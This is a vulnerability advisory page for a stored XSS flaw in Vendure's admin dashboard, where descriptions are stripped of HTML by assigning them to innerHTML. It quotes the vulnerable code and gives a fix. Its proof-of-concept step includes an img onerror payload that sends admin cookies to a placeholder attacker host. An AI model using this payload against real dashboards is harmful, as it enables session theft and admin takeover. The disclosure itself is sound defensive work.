VDB
Sign up
HIGH8.7

GHSA-xhq9-whgq-49j5

Vendure has stored XSS in the Admin Dashboard via unsafe HTML-stripping (innerHTML) of entity descriptions

Quick fix

GHSA-xhq9-whgq-49j5 — @vendure/dashboard: upgrade to the fixed version with the command below.

npm install @vendure/dashboard@3.6.5

Details

# Stored XSS in the Admin Dashboard via unsafe HTML-stripping (`innerHTML`) of entity descriptions

**Package:** @vendure/dashboard (vendure-ecommerce/vendure, latest master) ·

## Summary The dashboard's `RichTextDescriptionCell` "strips HTML" from an entity's `description` by assigning it to a live element's `innerHTML` and reading back `textContent`. This pattern still **executes** active markup: a `description` containing `<img src=x onerror=…>` runs script when the element is parsed (image resource loads even on a detached node in Chromium/Firefox, firing `onerror`). Because `description` is an admin-settable field shown in multiple list views, a lower-privilege administrator can store a payload that executes in a **higher-privilege administrator's** browser when they open the corresponding list — stored XSS leading to admin-session compromise.

## Vulnerable code `packages/dashboard/src/lib/components/shared/table-cell/order-table-cell-components.tsx` ```tsx export const RichTextDescriptionCell: DataTableCellComponent<{ description: string }> = ({ cell }) => { const value = cell.getValue(); const textContent = useMemo(() => { if (!value) return ''; const div = document.createElement('div'); div.innerHTML = value; // line 51 — parses/loads active markup; <img onerror> fires here return div.textContent ?? ''; // line 52 — reading textContent does NOT undo the side effect }, [value]); ... } ``` `innerHTML` does not run `<script>`, but it **does** trigger resource loads / event handlers such as `<img src=x onerror=...>`, `<image>`, `<svg>` handlers — even on a detached element — so the assignment itself is the sink. Reading `textContent` afterwards is irrelevant; the handler has already executed.

## Reachable from (all use this cell for the `description` column) - `_products/products.tsx:53`, `_collections/collections.tsx`, `_promotions/promotions.tsx:62`, `_payment-methods/payment-methods.tsx:57`, `_shipping-methods/shipping-methods.tsx:39`.

All of these are `description` fields editable by administrators with the corresponding catalog/promotion/settings write permissions — which, in Vendure's multi-channel model, includes **channel-scoped admins**.

## Proof of concept 1. As an administrator with `UpdateCatalog`/`UpdateProduct` (e.g. a channel-scoped admin), set a Product's `description` to: `<img src=x onerror="fetch('https://attacker.example/'+encodeURIComponent(document.cookie))">` 2. Any administrator who opens the **Products** list in the dashboard renders `RichTextDescriptionCell` for that row → `div.innerHTML = description` → the `onerror` executes in their session. 3. Payload runs with the viewing admin's privileges (e.g. a superadmin) → session/token exfiltration or admin actions → **cross-privilege / cross-channel admin takeover** (chains directly with the channel-scoping IDOR class already reported).

## Impact Stored XSS executing in administrators' browsers, escalating a low-privilege (e.g. single-channel) admin to actions as any admin who views the affected list. Account/store takeover.

## Suggested fix Strip HTML with an **inert** parser (no script/resource execution) instead of a live element, or sanitize before display: ```ts // inert: DOMParser documents do not execute scripts or load resources const textContent = new DOMParser().parseFromString(value ?? '', 'text/html').body.textContent ?? ''; ``` (Or render with a vetted sanitizer such as DOMPurify if rich text must be shown.) Audit the codebase for other `element.innerHTML = <untrusted>` assignments used for "stripping".

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/@vendure/dashboard
Introduced in: 0Fixed in: 3.6.5
Fixnpm install @vendure/dashboard@3.6.5

References